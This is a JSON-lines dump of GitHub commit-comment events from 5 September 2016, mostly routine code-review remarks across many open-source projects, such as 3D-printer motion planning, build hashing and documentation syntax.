{"id":"4517041828","type":"CommitCommentEvent","actor":{"login":"FrederickChan"},"repo":{"name":"php-fusion/PHP-Fusion"},"payload":{"comment":{"id":18900599,"position":null,"line":null,"path":null,"commit_id":"45a6e27b9b2f4a4f1efa5cb0559ed5f794f108a2","created_at":"2016-09-05T13:55:04Z","updated_at":"2016-09-05T13:55:04Z","body":"I was working on it the same time. "}},"created_at":"2016-09-05T13:55:04Z"}
{"id":"4517045303","type":"CommitCommentEvent","actor":{"login":"zerolab"},"repo":{"name":"torchbox/wagtail-torchbox"},"payload":{"comment":{"id":18900608,"position":null,"line":null,"path":null,"commit_id":"b674ac6be3189a36cc1d78f6c0444f7dc42d11d4","created_at":"2016-09-05T13:55:47Z","updated_at":"2016-09-05T13:55:47Z","body":"@nimasmi could this template use the main image field? Will avoid committing placeholder images to the repo..."}},"created_at":"2016-09-05T13:55:47Z"}
{"id":"4517045511","type":"CommitCommentEvent","actor":{"login":"jlelse"},"repo":{"name":"jlelse/NewsCatchr-OpenSource"},"payload":{"comment":{"id":18900609,"position":null,"line":null,"path":null,"commit_id":"1f174dea64a568cff7a031ecc99e9c707e928ebb","created_at":"2016-09-05T13:55:50Z","updated_at":"2016-09-05T13:55:50Z","body":"First step for #1 "}},"created_at":"2016-09-05T13:55:50Z"}
{"id":"4517047902","type":"CommitCommentEvent","actor":{"login":"vmassol"},"repo":{"name":"xwiki/xwiki-platform"},"payload":{"comment":{"id":18900614,"position":5,"line":163,"path":"xwiki-platform-tools/xwiki-platform-tool-packager-plugin/src/main/java/org/xwiki/tool/packager/PackageMojo.java","commit_id":"f70c18544967eb7c92759965d694ff12701c5938","created_at":"2016-09-05T13:56:22Z","updated_at":"2016-09-05T13:56:22Z","body":"what's the rationale for changing the maven property name? Even though it's not backward compatible, I guess there's going to be little breakage (although there must be some places where it's used as otherwise I wouldn't have introduced this - So we'll need to change this place too in the future - it's probably in some extensions in xwiki-conrtrib)."}},"created_at":"2016-09-05T13:56:22Z"}
{"id":"4517048674","type":"CommitCommentEvent","actor":{"login":"olesalscheider"},"repo":{"name":"TelepathyQt/telepathy-nonsense"},"payload":{"comment":{"id":18900617,"position":null,"line":null,"path":null,"commit_id":"6f2eddcad036b5e6feb51fab525d7bdafe426986","created_at":"2016-09-05T13:56:31Z","updated_at":"2016-09-05T13:56:31Z","body":"> Do we want to do it on QCoreApplication::aboutToQuit() signal or after app return\r\n\r\nI think the latter is easier if it works. In that case we could even make it a Debug class that registers the handler in the constructor and deregisters it in the destructor. I'm not sure if that would be nicer...\r\n\r\nApart from the comments, this looks good."}},"created_at":"2016-09-05T13:56:31Z"}
{"id":"4517049799","type":"CommitCommentEvent","actor":{"login":"chamnit"},"repo":{"name":"prusa3d/Prusa-Firmware"},"payload":{"comment":{"id":18900618,"position":null,"line":null,"path":null,"commit_id":"e0bb76032c5ec682da1e0d58214cb02840a6593b","created_at":"2016-09-05T13:56:46Z","updated_at":"2016-09-05T13:56:46Z","body":"@bubnikv : Sounds like you know what you are doing. I just want to add that all values involved with an integer calculation, not only need to watch out for max value overflows, but also must be greater than 1e7 (floats retain 7 significant digits). Pre or post. If its less, like 99999, you begin to lose precision in your calculation and the loss retained through any following calculations that uses this value. This is what I mean by being very careful, because not all values will be within this relatively narrow range. \r\n\r\nIn terms of Grbl's planner improvements, the easiest thing you can implement is the planner optimal pointer. There are ranges from the beginning to a certain point within each plan that cannot be optimized any further. Grbl detects for indicators for these points and points to it as the place to start/stop the re-planning process. It's very simple and laid out in the planner.c. Like I said before, except in very extreme and rare circumstances, the planner only needs to recalculate only a handful of the tail end of the planner buffer. The added overhead of checking for these indicators is very minimal so you'll see virtually no issues by doing this. It just adds code size that manages the pointer that makes sure that its set and reset correctly.\r\n\r\nThe other major improvement was moving the trapezoidal profile calculations out of the planner completely. They don't need to be computed until right before the stepper algorithm traces them out. This is much more involved of a change. It's in stepper.c as the step_segment_generator. In addition, this particular change also allows for real-time overrides to be possible. I'll be soon releasing Grbl v1.0 that will allow for real-time feed rate changes with simple commands. No more waiting for the buffer to complete to see a change. It's much more useful for spindles and cutting tools, than 3d printers though.\r\n\r\nAs for TinyG, I can give you a very detailed answer on this topic in private if you'd like. Email me, as I can't find yours. But in short, every official supporter of the Grbl project has evaluated TinyG at some point in time and all have dropped it. \r\n\r\nFor S-curve planning, the mathematics are surprisingly difficult to get completely right. Most of the online resources, even research papers, only show you the solutions to a very small subset of S-curve conditions, but never a complete solution for all the types of scenarios a motion plan can have. This is why you don't see full S-curve motion planning, typically only partial implementations like TinyG does. I'll say this though, I have about a 100 pages of derivations determining how to properly join multiple S-curve motions and intend to develop this into the ARM version of Grbl. This is something I'm keeping close until it's released, which is hopefully by the end of the year as a demonstration. The ARM version of Grbl will support 3d printers.\r\n\r\nOne last thing. I'm not sure why Marlin is still using the old jerk settings. They are only linear approximations of a nonlinear junction condition. Meaning that, a jerk setting will only work well within a small range of speed and junction angle.  This is one of the first things I fixed when I became the primary Grbl developer in 2011. I noticed Marlin has the junction deviation computation, disabled by a macro (and you just deleted it). This computation accurately solves for this junction nonlinearity. This allows you to go faster through a much larger range of speeds and path conditions without exceeding your motor torque (see Grbl-based laser cutters running often at 10,000mm/min or faster.). I've run tests physically exceeding 35,000mm/min through complex curves with this and would likely could go faster with NEMA23 or stronger steppers (had NEMA17 on a Shapeoko2). The junction deviation parameter needs to be around 0.005-0.02mm to see how it really works. For some reason, Marlin has it at 0.1mm, which is horribly too high. Using this should help with faster speeds and keeping resonance issues with 3d printer belts and changing directions more consistent. Since this algorithm will decelerate more when moving faster so you don't excite the vibrations as much when changing direction."}},"created_at":"2016-09-05T13:56:46Z"}
{"id":"4517052419","type":"CommitCommentEvent","actor":{"login":"JRooneyBusiness"},"repo":{"name":"fusionpbx/fusionpbx"},"payload":{"comment":{"id":18900626,"position":17,"line":261,"path":"resources/install/scripts/intercept.lua","commit_id":"15fbc21b4d5dbb2dee9e39308801188150d2c3b7","created_at":"2016-09-05T13:57:21Z","updated_at":"2016-09-05T13:57:21Z","body":"Why does it find the string \"inbound\" but appends \"OR.. outbound\" to the SQL query?\r\n\r\nAlso worth noting the order of the script - This version checks outbound - RINGING calls first. \r\nCustomer reported an issue where rarely they picked up their colleagues calls when trying to grab an inbound call. \r\n\r\nIf the customer prefers to grab inbound calls ahead of outbound, then rotate the SQL queries. \r\n"}},"created_at":"2016-09-05T13:57:21Z"}
{"id":"4517055009","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"mozilla/example-addon-repo"},"payload":{"comment":{"id":18900632,"position":null,"line":null,"path":null,"commit_id":"05ae371fd198d216f21fd717091e0d4463c7e620","created_at":"2016-09-05T13:57:56Z","updated_at":"2016-09-05T13:57:56Z","body":"TaskCluster-GitHub: https://tools.taskcluster.net/task-graph-inspector/#Y6Qc3KQbR5u9G7p5Xc_EdA"}},"created_at":"2016-09-05T13:57:56Z"}
{"id":"4517058601","type":"CommitCommentEvent","actor":{"login":"dira"},"repo":{"name":"Murzic/feed_manager"},"payload":{"comment":{"id":18900636,"position":11,"line":10,"path":"app/services/import_feed_service.rb","commit_id":"8b27cf1f47a5ab54927f8f3757fd5dc6d65b5237","created_at":"2016-09-05T13:58:45Z","updated_at":"2016-09-05T13:58:45Z","body":"Tx"}},"created_at":"2016-09-05T13:58:45Z"}
{"id":"4517061927","type":"CommitCommentEvent","actor":{"login":"dira"},"repo":{"name":"Murzic/feed_manager"},"payload":{"comment":{"id":18900644,"position":13,"line":12,"path":"app/services/import_feed_service.rb","commit_id":"8b27cf1f47a5ab54927f8f3757fd5dc6d65b5237","created_at":"2016-09-05T13:59:31Z","updated_at":"2016-09-05T13:59:31Z","body":"Why is this faster?"}},"created_at":"2016-09-05T13:59:31Z"}
{"id":"4517062990","type":"CommitCommentEvent","actor":{"login":"svx"},"repo":{"name":"testthedocs/ttd.training-docs-basics"},"payload":{"comment":{"id":18900649,"position":null,"line":null,"path":null,"commit_id":"7139b79b4c6dcd50019f82719537ef7c0872db3c","created_at":"2016-09-05T13:59:44Z","updated_at":"2016-09-05T13:59:44Z","body":"@polyester I am really thankful that you are fixing semantic linebreaks, but please be careful and check that you do not mess up Sphinx reST syntax :)\r\nIf you are not sure, you can always check these in the docs of Sphinx or even here: on docs.plone.org.\r\n\r\nFor this issue here, you van find it here:\r\n\r\nhttp://docs.plone.org/about/rst-styleguide.html#topic\r\n\r\n:)\r\n\r\nYou change here broke  the tests :)\r\n\r\nThanks !!!  :)"}},"created_at":"2016-09-05T13:59:44Z"}
{"id":"4517064022","type":"CommitCommentEvent","actor":{"login":"Ghostkeeper"},"repo":{"name":"Ultimaker/cura-build-environment"},"payload":{"comment":{"id":18900653,"position":9,"line":9,"path":"projects/arcus.cmake","commit_id":"5762b5ef54f2e6bba13cae99616ce1e29be57d65","created_at":"2016-09-05T13:59:59Z","updated_at":"2016-09-05T13:59:59Z","body":"Is it wise to also add a hash to this download?"}},"created_at":"2016-09-05T13:59:59Z"}
{"id":"4517064101","type":"CommitCommentEvent","actor":{"login":"Sanne"},"repo":{"name":"hibernate/in.relation.to"},"payload":{"comment":{"id":18900654,"position":25,"line":25,"path":"posts/Guillaume/2016-09-05-hibernate-validator-530-cr1-out.adoc","commit_id":"ccd0d33f61919d603ddbb46813eb139df1f0c96e","created_at":"2016-09-05T14:00:00Z","updated_at":"2016-09-05T14:00:00Z","body":"`The fact is that [...]` \r\nI understand what you mean but this is not expression I'd use in this context"}},"created_at":"2016-09-05T14:00:00Z"}
{"id":"4517069128","type":"CommitCommentEvent","actor":{"login":"Malcolmbint"},"repo":{"name":"aperepel/raspberrypi-ch340-driver"},"payload":{"comment":{"id":18900661,"position":null,"line":null,"path":null,"commit_id":"85da5acdf0778e010d7fb30c4c3da8828c884459","created_at":"2016-09-05T14:01:02Z","updated_at":"2016-09-05T14:01:02Z","body":"when I try to install it says Invalid module format  ? "}},"created_at":"2016-09-05T14:01:02Z"}
{"id":"4517072212","type":"CommitCommentEvent","actor":{"login":"cfollet"},"repo":{"name":"KeitIG/museeks"},"payload":{"comment":{"id":18900673,"position":37,"line":37,"path":"src/js/utils/utils.js","commit_id":"a51edaca774e8bcbf89481980e9981808cb99fce","created_at":"2016-09-05T14:01:43Z","updated_at":"2016-09-05T14:01:43Z","body":"Thank you. Sorry for being so picky."}},"created_at":"2016-09-05T14:01:43Z"}
{"id":"4517073009","type":"CommitCommentEvent","actor":{"login":"ArtEze"},"repo":{"name":"ArtEze/Otecald"},"payload":{"comment":{"id":18900674,"position":null,"line":null,"path":null,"commit_id":"0ea925c9e0dfe1be4c05773937a3a770b24002b2","created_at":"2016-09-05T14:01:53Z","updated_at":"2016-09-05T14:01:53Z","body":"Primer pull request."}},"created_at":"2016-09-05T14:01:53Z"}
{"id":"4517077226","type":"CommitCommentEvent","actor":{"login":"vmassol"},"repo":{"name":"xwiki/xwiki-platform"},"payload":{"comment":{"id":18900680,"position":null,"line":null,"path":null,"commit_id":"7f7e1fe9d7bf6ddd0297292519c0a8c2ed908f8f","created_at":"2016-09-05T14:02:49Z","updated_at":"2016-09-05T14:02:49Z","body":"Why is this better. I much prefer using ```{@code...``` because it supports any char inside (when you use ```<code>``` you need to XML-escape them.\r\n\r\nFor example https://github.com/xwiki/xwiki-commons/blob/0eedaf53cac460a3e4171d855a92d1adf31e87b0/xwiki-commons-tools/xwiki-commons-tool-enforcers/xwiki-commons-tool-enforcer-dependencies/src/main/java/org/xwiki/tool/enforcer/ValidateDependencyVersion.java#L40-L40"}},"created_at":"2016-09-05T14:02:49Z"}
{"id":"4517079161","type":"CommitCommentEvent","actor":{"login":"Kinzcool"},"repo":{"name":"TrinityCore/TrinityCore"},"payload":{"comment":{"id":18900684,"position":1,"line":1,"path":"sql/updates/world/6.x/2016_09_05_06_world.sql","commit_id":"8d8489ccfcb99fa00442d8a208ae1ed149ca8ae2","created_at":"2016-09-05T14:03:15Z","updated_at":"2016-09-05T14:03:15Z","body":"Meaningless (in that case) autogenerated WPP comments."}},"created_at":"2016-09-05T14:03:15Z"}
{"id":"4517079918","type":"CommitCommentEvent","actor":{"login":"vmassol"},"repo":{"name":"xwiki/xwiki-platform"},"payload":{"comment":{"id":18900686,"position":null,"line":null,"path":null,"commit_id":"16142b5d27d3cee3b325cba43f35ab4256056192","created_at":"2016-09-05T14:03:25Z","updated_at":"2016-09-05T14:03:25Z","body":"Why is this better. I much prefer using ```{@code...``` because it supports any char inside (when you use ```<code>``` you need to XML-escape them.\r\n\r\nFor example https://github.com/xwiki/xwiki-commons/blob/0eedaf53cac460a3e4171d855a92d1adf31e87b0/xwiki-commons-tools/xwiki-commons-tool-enforcers/xwiki-commons-tool-enforcer-dependencies/src/main/java/org/xwiki/tool/enforcer/ValidateDependencyVersion.java#L40-L40"}},"created_at":"2016-09-05T14:03:25Z"}
{"id":"4517082320","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":18900689,"position":null,"line":null,"path":null,"commit_id":"1bb2861edac81a88c5331dcaba558cd7cda196c7","created_at":"2016-09-05T14:03:58Z","updated_at":"2016-09-05T14:03:58Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 923](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=12589&buildTypeId=ota_plus_RviSotaServer_Ci) is now running\n"}},"created_at":"2016-09-05T14:03:58Z"}
{"id":"4517082832","type":"CommitCommentEvent","actor":{"login":"dariostr"},"repo":{"name":"sebaualde/Obligatorio-Ingenieria-Software-2016-"},"payload":{"comment":{"id":18900690,"position":null,"line":null,"path":null,"commit_id":"d178623032122cb800aa239d0281db9452421c5b","created_at":"2016-09-05T14:04:06Z","updated_at":"2016-09-05T14:04:06Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;vOVEB4aJ&#x2F;7-objetivos-del-sistema\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> Objetivos del sistema</a>"}},"created_at":"2016-09-05T14:04:06Z"}
{"id":"4517084327","type":"CommitCommentEvent","actor":{"login":"sammygriffiths"},"repo":{"name":"JakeParry/hello-world"},"payload":{"comment":{"id":18900693,"position":7,"line":7,"path":"README.md","commit_id":"621afb7c16c4bc5c98bc50154975488648d3865c","created_at":"2016-09-05T14:04:23Z","updated_at":"2016-09-05T14:04:23Z","body":"attempt*"}},"created_at":"2016-09-05T14:04:23Z"}
{"id":"4517087759","type":"CommitCommentEvent","actor":{"login":"vmassol"},"repo":{"name":"xwiki/xwiki-platform"},"payload":{"comment":{"id":18900700,"position":null,"line":null,"path":null,"commit_id":"16142b5d27d3cee3b325cba43f35ab4256056192","created_at":"2016-09-05T14:05:10Z","updated_at":"2016-09-05T14:05:10Z","body":"Actually I wanted to propose https://github.com/xwiki/xwiki-commons/blob/0eedaf53cac460a3e4171d855a92d1adf31e87b0/xwiki-commons-tools/xwiki-commons-tool-enforcers/xwiki-commons-tool-enforcer-dependencies/src/main/java/org/xwiki/tool/enforcer/ValidateDependencyVersion.java#L40-L40 as a best practice for documenting examples and add it to http://dev.xwiki.org/xwiki/bin/view/Community/JavaCodeStyle but first we need to agree :)"}},"created_at":"2016-09-05T14:05:10Z"}
{"id":"4517093166","type":"CommitCommentEvent","actor":{"login":"peachyang"},"repo":{"name":"peachyang/peach"},"payload":{"comment":{"id":18900713,"position":null,"line":null,"path":null,"commit_id":"22400126845705fd74b16cdb7a14135a23e254a2","created_at":"2016-09-05T14:06:20Z","updated_at":"2016-09-05T14:06:20Z","body":"github stadys today"}},"created_at":"2016-09-05T14:06:20Z"}
{"id":"4517096957","type":"CommitCommentEvent","actor":{"login":"samybob1"},"repo":{"name":"lionng429/react-file-uploader"},"payload":{"comment":{"id":18900719,"position":98,"line":71,"path":"src/UploadHandler.js","commit_id":"1dc67af3c15c6109122f05f0dbc8e205dbcb1fd8","created_at":"2016-09-05T14:07:11Z","updated_at":"2016-09-05T14:07:11Z","body":"Is this prop really required? :confused: \r\nYou are not using it in your [example](https://github.com/lionng429/react-file-uploader/blob/master/examples/basic/client.js#L137)."}},"created_at":"2016-09-05T14:07:11Z"}
{"id":"4517098125","type":"CommitCommentEvent","actor":{"login":"Dyrocha44"},"repo":{"name":"reactexcel/Etech_Recruitment"},"payload":{"comment":{"id":18900720,"position":35,"line":128,"path":"src/app/client/components/emailbody/emailbody.jsx","commit_id":"9f24520858fcc63fa4e865bcb7651eb11309c49d","created_at":"2016-09-05T14:07:25Z","updated_at":"2016-09-05T14:07:25Z","body":"El "}},"created_at":"2016-09-05T14:07:25Z"}
{"id":"4517106918","type":"CommitCommentEvent","actor":{"login":"blackinitial"},"repo":{"name":"blackinitial/try_laravel_5.3"},"payload":{"comment":{"id":18900731,"position":null,"line":null,"path":null,"commit_id":"c0d6d460c3535a863c85cb6b457cb12116c4de2c","created_at":"2016-09-05T14:09:22Z","updated_at":"2016-09-05T14:09:22Z","body":"belajar models\r\n"}},"created_at":"2016-09-05T14:09:22Z"}
{"id":"4517108771","type":"CommitCommentEvent","actor":{"login":"shlevy"},"repo":{"name":"NixOS/nixpkgs"},"payload":{"comment":{"id":18900734,"position":null,"line":null,"path":null,"commit_id":"8d977ead386cf29b8b395caca536bfaec9c36efe","created_at":"2016-09-05T14:09:45Z","updated_at":"2016-09-05T14:09:45Z","body":"We aren't. That was discussed in this thread :smile: "}},"created_at":"2016-09-05T14:09:45Z"}
{"id":"4517109551","type":"CommitCommentEvent","actor":{"login":"Ghostkeeper"},"repo":{"name":"Ultimaker/cura-build-environment"},"payload":{"comment":{"id":18900735,"position":null,"line":null,"path":null,"commit_id":"b3f607db930864e8ee35a990efd8b3b6c27f6313","created_at":"2016-09-05T14:09:54Z","updated_at":"2016-09-05T14:09:54Z","body":"Discussed this with ahiemstra. This patch has not been communicated upstream yet. So note: Please tell the cx_freeze developers about it.\r\n\r\nApparently it was needed because in our environment, cx_freeze itself is in the path, which causes an infinite recursion here."}},"created_at":"2016-09-05T14:09:54Z"}
{"id":"4517111269","type":"CommitCommentEvent","actor":{"login":"Ravensss"},"repo":{"name":"Ravensss/webscan"},"payload":{"comment":{"id":18900738,"position":6,"line":7,"path":"README.md","commit_id":"782e3b932e4aa14c1b0648e17ade5954523f0666","created_at":"2016-09-05T14:10:15Z","updated_at":"2016-09-05T14:10:15Z","body":"****"}},"created_at":"2016-09-05T14:10:15Z"}
{"id":"4517111570","type":"CommitCommentEvent","actor":{"login":"rz5"},"repo":{"name":"libretro/slang-shaders"},"payload":{"comment":{"id":18900740,"position":null,"line":null,"path":null,"commit_id":"6661202ae146eecb9aa0a9273542e4002c1789c2","created_at":"2016-09-05T14:10:18Z","updated_at":"2016-09-05T14:10:18Z","body":"@hunterk, perhaps the test/nonfunctional category isn't a good idea? What you did in these past commits I did a month ago, it's located here: https://github.com/libretro/slang-shaders/blob/master/test/nonfunctional/shaders/crt-easymode-halation/crt-easymode-halation.slang\r\n\r\nIf what you did looks like the Cg version, cheers!"}},"created_at":"2016-09-05T14:10:18Z"}
{"id":"4517111584","type":"CommitCommentEvent","actor":{"login":"Majkl578"},"repo":{"name":"Kdyby/Clock"},"payload":{"comment":{"id":18900742,"position":null,"line":null,"path":null,"commit_id":"087b34bb019219d49eb39db81aae2e0324aa6d2f","created_at":"2016-09-05T14:10:19Z","updated_at":"2016-09-05T14:10:19Z","body":"Ok, this is weird... My commit was signed, but here it's signed by your GPG key. 😳 "}},"created_at":"2016-09-05T14:10:19Z"}
{"id":"4517114129","type":"CommitCommentEvent","actor":{"login":"vleung67"},"repo":{"name":"arynchoong/MTech-KE-DWBA"},"payload":{"comment":{"id":18900749,"position":null,"line":null,"path":null,"commit_id":"2fd087746c795135725a7933072e4c33f3d7e6c6","created_at":"2016-09-05T14:10:50Z","updated_at":"2016-09-05T14:10:50Z","body":"Number of HDB carparks by region"}},"created_at":"2016-09-05T14:10:50Z"}
{"id":"4517122739","type":"CommitCommentEvent","actor":{"login":"Ghostkeeper"},"repo":{"name":"Ultimaker/cura-build-environment"},"payload":{"comment":{"id":18900763,"position":10,"line":10,"path":"projects/numpy-stl.cmake","commit_id":"5762b5ef54f2e6bba13cae99616ce1e29be57d65","created_at":"2016-09-05T14:12:43Z","updated_at":"2016-09-05T14:12:43Z","body":"Is this not working? Why is it commented away?"}},"created_at":"2016-09-05T14:12:43Z"}
{"id":"4517125006","type":"CommitCommentEvent","actor":{"login":"TianyuHuang"},"repo":{"name":"TianyuHuang/Version-Control-Practice"},"payload":{"comment":{"id":18900770,"position":1,"line":1,"path":"README.md","commit_id":"4018a003dd51cd36b327ecbe1eae7bc77a658801","created_at":"2016-09-05T14:13:15Z","updated_at":"2016-09-05T14:13:15Z","body":"@@ -0,0 +1,17 @@\r\n# Auto detect text files and perform LF normalization\r\n* text=auto\r\n\r\n# Custom for Visual Studio\r\n*.cs     diff=csharp\r\n\r\n# Standard to msysgit\r\n*.doc\t diff=astextplain\r\n*.DOC\t diff=astextplain\r\n*.docx diff=astextplain\r\n*.DOCX diff=astextplain\r\n*.dot  diff=astextplain\r\n*.DOT  diff=astextplain\r\n*.pdf  diff=astextplain\r\n*.PDF\t diff=astextplain\r\n*.rtf\t diff=astextplain\r\n*.RTF\t diff=astextplain"}},"created_at":"2016-09-05T14:13:15Z"}
{"id":"4517126475","type":"CommitCommentEvent","actor":{"login":"Flarp"},"repo":{"name":"Kurimizumi/Honeybee-Hive"},"payload":{"comment":{"id":18900771,"position":null,"line":null,"path":null,"commit_id":"cee24fc8c73d23d63d41d3a4ca81dea30e8fc020","created_at":"2016-09-05T14:13:35Z","updated_at":"2016-09-05T14:13:35Z","body":"#7 "}},"created_at":"2016-09-05T14:13:35Z"}
{"id":"4517126578","type":"CommitCommentEvent","actor":{"login":"Ghostkeeper"},"repo":{"name":"Ultimaker/cura-build-environment"},"payload":{"comment":{"id":18900773,"position":8,"line":8,"path":"projects/numpy.cmake","commit_id":"5762b5ef54f2e6bba13cae99616ce1e29be57d65","created_at":"2016-09-05T14:13:37Z","updated_at":"2016-09-05T14:13:37Z","body":"Should we also include a hash here?"}},"created_at":"2016-09-05T14:13:37Z"}
{"id":"4517128114","type":"CommitCommentEvent","actor":{"login":"fprochazka"},"repo":{"name":"Kdyby/Clock"},"payload":{"comment":{"id":18900778,"position":null,"line":null,"path":null,"commit_id":"087b34bb019219d49eb39db81aae2e0324aa6d2f","created_at":"2016-09-05T14:13:56Z","updated_at":"2016-09-05T14:13:56Z","body":"Well, I did cherrypick (or rebase, do not remember) it. I guess that git signs the commit again when you do that."}},"created_at":"2016-09-05T14:13:56Z"}
{"id":"4517128427","type":"CommitCommentEvent","actor":{"login":"myaskevich"},"repo":{"name":"FaridSafi/react-native-google-places-autocomplete"},"payload":{"comment":{"id":18900779,"position":null,"line":null,"path":null,"commit_id":"b45ffe821233f9480d9c3c1401843fc3976af9e1","created_at":"2016-09-05T14:14:02Z","updated_at":"2016-09-05T14:14:02Z","body":"HI @dieguitoweb \r\n\r\nCheck out version 1.2.3\r\n\r\n"}},"created_at":"2016-09-05T14:14:02Z"}
{"id":"4517128481","type":"CommitCommentEvent","actor":{"login":"samybob1"},"repo":{"name":"lionng429/react-file-uploader"},"payload":{"comment":{"id":18900780,"position":93,"line":68,"path":"src/UploadHandler.js","commit_id":"1dc67af3c15c6109122f05f0dbc8e205dbcb1fd8","created_at":"2016-09-05T14:14:03Z","updated_at":"2016-09-05T14:14:03Z","body":"This is causing a warning:\r\n>Warning: UploadHandler: `key` is not a prop. Trying to access it will result in `undefined` being returned. If you need to access the same value within the child component, you should pass it as a different prop. (https://fb.me/react-special-props)\r\n\r\nI think that you don't need to define this prop."}},"created_at":"2016-09-05T14:14:03Z"}
{"id":"4517129559","type":"CommitCommentEvent","actor":{"login":"blerner"},"repo":{"name":"brownplt/code.pyret.org"},"payload":{"comment":{"id":18900781,"position":104,"line":0,"path":"src/web/arr/trove/plot.arr","commit_id":"dc515df3593b75bd82747dc579c1cde873e1fcb1","created_at":"2016-09-05T14:14:18Z","updated_at":"2016-09-05T14:14:18Z","body":"Having these delegate to the arbitrary arity method kinda defeats their purpose, which is to avoid allocating the extra array..."}},"created_at":"2016-09-05T14:14:18Z"}
{"id":"4517131198","type":"CommitCommentEvent","actor":{"login":"Ghostkeeper"},"repo":{"name":"Ultimaker/cura-build-environment"},"payload":{"comment":{"id":18900783,"position":20,"line":20,"path":"projects/numpy.cmake","commit_id":"5762b5ef54f2e6bba13cae99616ce1e29be57d65","created_at":"2016-09-05T14:14:39Z","updated_at":"2016-09-05T14:14:39Z","body":"Probably better to use `URL_HASH SHA512=...` or something instead of MD5."}},"created_at":"2016-09-05T14:14:39Z"}
{"id":"4517136711","type":"CommitCommentEvent","actor":{"login":"moteus"},"repo":{"name":"fusionpbx/fusionpbx"},"payload":{"comment":{"id":18900796,"position":17,"line":261,"path":"resources/install/scripts/intercept.lua","commit_id":"15fbc21b4d5dbb2dee9e39308801188150d2c3b7","created_at":"2016-09-05T14:15:55Z","updated_at":"2016-09-05T14:15:55Z","body":"`outbound` call from Fusion point of view is call from User (extension) to FreeSwitch.\r\nBut from FS point of view it is `inbound` call because it goes to FreeSwitch, not from.\r\nE.g.\r\n`World`->(inbound)->`FS`->(outbound)->`Extension`\r\nIn this case we intercept `outbound` leg. But from user perspective it is inbound call.\r\n"}},"created_at":"2016-09-05T14:15:55Z"}
{"id":"4517136814","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":18900799,"position":null,"line":null,"path":null,"commit_id":"1bb2861edac81a88c5331dcaba558cd7cda196c7","created_at":"2016-09-05T14:15:56Z","updated_at":"2016-09-05T14:15:56Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 923](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=12589&buildTypeId=ota_plus_RviSotaServer_Ci) outcome was **SUCCESS**\nSummary: Tests passed: 237, ignored: 3 Build time: 00:11:58"}},"created_at":"2016-09-05T14:15:56Z"}
{"id":"4517137095","type":"CommitCommentEvent","actor":{"login":"matthuhiggins"},"repo":{"name":"data-axle/superstore"},"payload":{"comment":{"id":18900803,"position":null,"line":null,"path":null,"commit_id":"81dbac521e3e79e47a3702fcdd6751cbaa32a955","created_at":"2016-09-05T14:16:01Z","updated_at":"2016-09-05T14:16:01Z","body":"> I searched for a bit and couldn't find a reference to where Rails devs have declared that they actually do some variation on semantic versioning.\r\n\r\nPick another popular open source project, such as Ruby itself. Re-read my point with \"your-favorite-project\", rather than \"Rails\".\r\n\r\n> In my experience, users tend to prefer \"release early and often\" rather than \"bundle a bunch of changes and release a new minor version in a month\".\r\n\r\nI dislike \"release a new minor version in a month\" as much as \"release a new version after each feature\". Both are prescribed formulas for something requiring more judgement.\r\n\r\n> Ruby/Rails developers may be less averse to use git references in Gemfile than Node/Electron developers in package.json, for example. One way we could address both ends of the spectrum is to utilize pre-releases.\r\n\r\nWe could certainly do `.pre` releases. That would have been an option in this case (ie 2.4.0.pre). Ruby developers, at least myself, are certainly not averse to git references. I think they are great, actually. It gives risking-taking app developers a chance to try something new without forcing a full release process.\r\n\r\n> In this case, it looks like the new Rails 5 support was not entirely complete.\r\n\r\nMy understanding is that this got the tests to pass, but has not been tried out in a real Rails 5 application. Perhaps I underestimated the rigorousness of this effort?\r\n\r\nThis work is nonetheless really great. I must be more careful about my casual comments...\r\n"}},"created_at":"2016-09-05T14:16:01Z"}
{"id":"4517139254","type":"CommitCommentEvent","actor":{"login":"polyester"},"repo":{"name":"testthedocs/ttd.training-docs-basics"},"payload":{"comment":{"id":18900812,"position":null,"line":null,"path":null,"commit_id":"7139b79b4c6dcd50019f82719537ef7c0872db3c","created_at":"2016-09-05T14:16:30Z","updated_at":"2016-09-05T14:16:30Z","body":"sorry, had overlooked that ``.. topic::``\r\n\r\nNow, if only we had a quick way to check sphinx syntax ;-)"}},"created_at":"2016-09-05T14:16:30Z"}
{"id":"4517140456","type":"CommitCommentEvent","actor":{"login":"hizzlekizzle"},"repo":{"name":"libretro/slang-shaders"},"payload":{"comment":{"id":18900813,"position":null,"line":null,"path":null,"commit_id":"6661202ae146eecb9aa0a9273542e4002c1789c2","created_at":"2016-09-05T14:16:46Z","updated_at":"2016-09-05T14:16:46Z","body":"I think it looks like the Cg version but independent verification would be good, since i'm not super-familiar with that shader.\r\n\r\nwhoops, I forgot you had worked on it already! Personally, I think the risk of duplicating effort is worth keeping broken shaders out of the main directories but I'm not married to that."}},"created_at":"2016-09-05T14:16:46Z"}
{"id":"4517142165","type":"CommitCommentEvent","actor":{"login":"vlouzada"},"repo":{"name":"vlouzada/EDL"},"payload":{"comment":{"id":18900814,"position":null,"line":null,"path":null,"commit_id":"0a615dd2b62cb036d73df54075061f629f4bf57c","created_at":"2016-09-05T14:17:08Z","updated_at":"2016-09-05T14:17:08Z","body":"Pronto"}},"created_at":"2016-09-05T14:17:08Z"}
{"id":"4517143865","type":"CommitCommentEvent","actor":{"login":"blerner"},"repo":{"name":"brownplt/code.pyret.org"},"payload":{"comment":{"id":18900816,"position":54,"line":0,"path":"src/web/js/trove/d3-lib.js","commit_id":"dc515df3593b75bd82747dc579c1cde873e1fcb1","created_at":"2016-09-05T14:17:30Z","updated_at":"2016-09-05T14:17:30Z","body":"Where do these magic constants come from? "}},"created_at":"2016-09-05T14:17:30Z"}
